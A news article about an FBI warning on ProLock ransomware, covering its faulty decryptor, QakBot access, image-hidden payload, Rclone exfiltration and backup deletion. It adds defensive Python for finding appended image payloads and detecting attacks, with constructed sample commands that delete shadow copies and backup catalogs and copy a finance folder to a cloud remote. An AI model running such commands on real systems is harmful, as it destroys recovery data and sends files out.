Wednesday, October 21, 05:06

The FBI warns that ProLock ransomware is the new threat

Many attackers saw the Covid-19 pandemic as the perfect opportunity to target an already overloaded healthcare sector. ProLock ransomware is another threat added to the list.

The FBI issued a warning earlier this month to alert organizations to the new threat actor, saying its targets in the US include entities in the following sectors: healthcare, government, finance and retail.


Decryption malfunction

The FBI does not encourage paying any ransom demand. Doing so only emboldens the attackers to continue such attacks.

Paying is also a gamble: ProLock's decryptor does not work properly, and data can be lost. Files larger than 64 MB may be corrupted during decryption.

Files over 100 MB can lose about 1 byte per 1 KB, and extra work may be needed before the decryptor produces usable output. This adds to an organization's downtime even if it pays the ransom.

The malware launched as PwndLocker in late 2019 and made a name for itself by targeting businesses and local governments, scaling its ransom demands to the size of the compromised network.

After a bug that allowed free decryption was fixed, PwndLocker reappeared as ProLock in March, and its activity began to escalate.

Network access

According to a recent report by cybersecurity firm Group-IB, ProLock has partnered with the QakBot banking trojan to gain access to victims' networks, which probably contributed to the rise of this ransomware.

The trojan does not install the ransomware itself; it runs a script that gives the operators a foothold in the victim's network so they can map it and move laterally. The ransomware payload is extracted from a BMP or JPG image file named WinMgr and loaded into memory.
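A payload hidden in an image file is often simply appended after the image data, so a first-pass check is to recompute where the picture really ends and see whether anything follows. The script below is an added example for this article, not code from the page, Group-IB or the FBI, and it does not claim to reproduce how ProLock packs its payload: it assumes the appended-data layout, parses the BMP and JPEG structure itself, and runs on constructed sample images (the "WinMgr" file names and the stub payload are made up for the demonstration).

```python
import struct

# In entropy-coded JPEG data, FF is followed by 00 (byte stuffing) or an RSTn
# marker (D0-D7); any other byte after FF starts a real marker.
_NOT_A_MARKER = {0x00, *range(0xD0, 0xD8)}


def bmp_trailing_bytes(data: bytes) -> bytes:
    """Bytes after the pixel array of an uncompressed (BI_RGB) bitmap.

    The image end is recomputed from width, height and bits per pixel rather
    than read from the file-size field at offset 2, which an attacker can
    rewrite to cover appended data.
    """
    if len(data) < 54 or data[:2] != b"BM":
        raise ValueError("not a BMP file")
    pixel_offset = struct.unpack_from("<I", data, 10)[0]
    dib_size, width, height = struct.unpack_from("<Iii", data, 14)
    bpp, compression = struct.unpack_from("<HI", data, 28)
    if dib_size < 40 or compression != 0:
        raise ValueError("only uncompressed BITMAPINFOHEADER bitmaps are handled")
    row_size = ((bpp * abs(width) + 31) // 32) * 4   # rows are padded to 4 bytes
    image_end = pixel_offset + row_size * abs(height)
    if image_end > len(data):
        raise ValueError("pixel array extends past end of file")
    return data[image_end:]


def jpeg_trailing_bytes(data: bytes) -> bytes:
    """Bytes after the End Of Image marker (FF D9) of a JPEG.

    Marker segments are walked instead of searching for the last FF D9,
    because the appended payload (or an embedded EXIF thumbnail) may itself
    contain that byte pair.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG file")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                              # EOI: image proper ends here
            return data[pos + 2:]
        if marker == 0xFF:                              # fill byte before a marker
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:    # standalone markers, no length
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated marker segment")
        pos += 2 + struct.unpack_from(">H", data, pos + 2)[0]
        if marker == 0xDA:                              # SOS: skip entropy-coded data
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] not in _NOT_A_MARKER
            ):
                pos += 1
    raise ValueError("no EOI marker found")


def find_appended_payload(data: bytes) -> bytes:
    """Dispatch on magic bytes; returns b'' when nothing trails the image."""
    if data[:2] == b"BM":
        return bmp_trailing_bytes(data)
    if data[:2] == b"\xff\xd8":
        return jpeg_trailing_bytes(data)
    raise ValueError("unsupported image format")


# --- constructed samples (not real ProLock artefacts) -------------------------

def build_bmp(payload: bytes = b"") -> bytes:
    """2x2 pixel, 24 bpp bitmap whose file-size field is 'fixed up' to include
    the payload, as an attacker would do to defeat a naive size comparison."""
    width, height, bpp = 2, 2, 24
    pixels = bytes(((bpp * width + 31) // 32) * 4 * height)    # 16 zero bytes
    total = 54 + len(pixels) + len(payload)
    file_header = b"BM" + struct.pack("<IHHI", total, 0, 0, 54)
    dib_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, bpp, 0,
                             len(pixels), 2835, 2835, 0, 0)
    return file_header + dib_header + pixels + payload


def build_jpeg(payload: bytes = b"") -> bytes:
    """Structurally valid (not decodable) JPEG: SOI, APP0, SOS header, a few
    scan bytes including a stuffed FF 00, then EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 7) + b"JFIF\x00"
    sos = b"\xff\xda" + struct.pack(">H", 3) + b"\x01"
    scan = b"\x12\x34\xff\x00\x56"
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + payload


# Stand-in for a hidden executable; it deliberately starts with FF D9 so that a
# "find the last EOI marker" shortcut would misreport the payload size.
FAKE_PAYLOAD = b"\xff\xd9CONSTRUCTED-PAYLOAD-STUB"

if __name__ == "__main__":
    for name, blob in (("WinMgr.bmp", build_bmp(FAKE_PAYLOAD)),
                       ("WinMgr.jpg", build_jpeg(FAKE_PAYLOAD)),
                       ("clean.bmp", build_bmp())):
        print(f"{name}: {len(find_appended_payload(blob))} trailing byte(s)")
```

Trailing bytes are a signal, not proof: some legitimate tools leave metadata after the image, so the next step in triage is to look at what the trailing bytes are (an MZ header, a script, high-entropy data) rather than alerting on their mere presence.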

Like other ransomware operators, ProLock spends time in the victim's network looking for high-value systems and important data to steal before encrypting. The stolen data is exfiltrated with Rclone, a command-line tool for syncing files with various cloud storage services.

The ransom demand that follows encryption comes with a threat to publish the victims' data on public websites and social media unless they pay for decryption.

Other access methods include misconfigured Remote Desktop Protocol (RDP) servers. Where RDP is protected only by single-factor authentication, the attackers log in with stolen credentials.

Once inside, ProLock operators make sure they leave no way to recover files without paying. Any backups and shadow copies they find are deleted or encrypted.
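Both the Rclone exfiltration described above and the destruction of shadow copies show up in process-creation telemetry (Sysmon event 1, Security event 4688) before the encryptor runs, which makes them useful tripwires. The script below is an added example for this article, not code from the page or from Group-IB or the FBI. Its sample events are constructed, it does not assert which specific commands ProLock runs (the shadow-copy patterns are the commonly abused vssadmin, wmic, wbadmin and bcdedit invocations), and it keys the Rclone rule on argument shape and a few well-known rclone options (--config, --transfers, --bwlimit, --progress/-P) because the binary is routinely renamed.

```python
import re

# Constructed process-creation events (not real telemetry). The two fields are
# what Sysmon event 1 or Security event 4688 would provide.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"image": r"C:\Windows\System32\wbadmin.exe",
     "cmdline": "wbadmin delete catalog -quiet"},
    # rclone copied to a misleading name; only the argument shape gives it away
    {"image": r"C:\Users\Public\svchost.exe",
     "cmdline": r'svchost.exe copy "D:\Finance" mega:exfil '
                r"--config C:\Users\Public\r.conf --transfers 16 -P"},
    # benign: listing shadow copies, and a robocopy between local drives
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
    {"image": r"C:\Windows\System32\Robocopy.exe",
     "cmdline": r"robocopy D:\Finance E:\Backup /MIR"},
]

SHADOW_COPY_TAMPERING = [
    re.compile(r"\bvssadmin(?:\.exe)?\s+(?:delete\s+shadows|resize\s+shadowstorage)\b", re.I),
    re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
    re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+(?:catalog|systemstatebackup)\b", re.I),
    re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I),
]

# An rclone transfer verb followed by a remote spec, "name:path" or ":backend:path".
# Two or more characters before the colon excludes Windows drive letters; URL
# schemes still match, which is why an rclone option is required as well.
RCLONE_TRANSFER = re.compile(
    r"\b(?:copy|copyto|sync|move|moveto)\b.*?(?:^|\s|\")(?::?[A-Za-z0-9_-]{2,}:)[^\s\"]*",
    re.I,
)
RCLONE_OPTIONS = re.compile(r"(?:^|\s)(?:--config|--transfers|--bwlimit|--progress|-P)\b")


def detect(event: dict) -> list[str]:
    """Return the names of the rules an event trips (empty list if none)."""
    cmd = event["cmdline"]
    hits = []
    if any(rule.search(cmd) for rule in SHADOW_COPY_TAMPERING):
        hits.append("shadow_copy_tampering")
    if RCLONE_TRANSFER.search(cmd) and (
        RCLONE_OPTIONS.search(cmd) or "rclone" in event["image"].lower()
    ):
        hits.append("rclone_exfiltration")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> triggered rules, for every event that tripped a rule."""
    return {i: hits for i, e in enumerate(events) if (hits := detect(e))}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(hits)} <- {SAMPLE_EVENTS[i]['cmdline']}")
```

In practice the shadow-copy rule should page immediately (legitimate administrators rarely delete all shadow copies quietly), while the Rclone rule is better correlated with the destination: a remote spec pointing at a cloud provider the organization does not use is the strongest indicator of staging for the extortion described above.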

With ransom demands ranging from $175,000 to more than $660,000, ProLock is as serious a threat as other, more infamous ransomware families such as Maze, Sodinokibi, Ryuk or LockerGoga, which are considered the top players in the ransomware business.


Teo Ehc

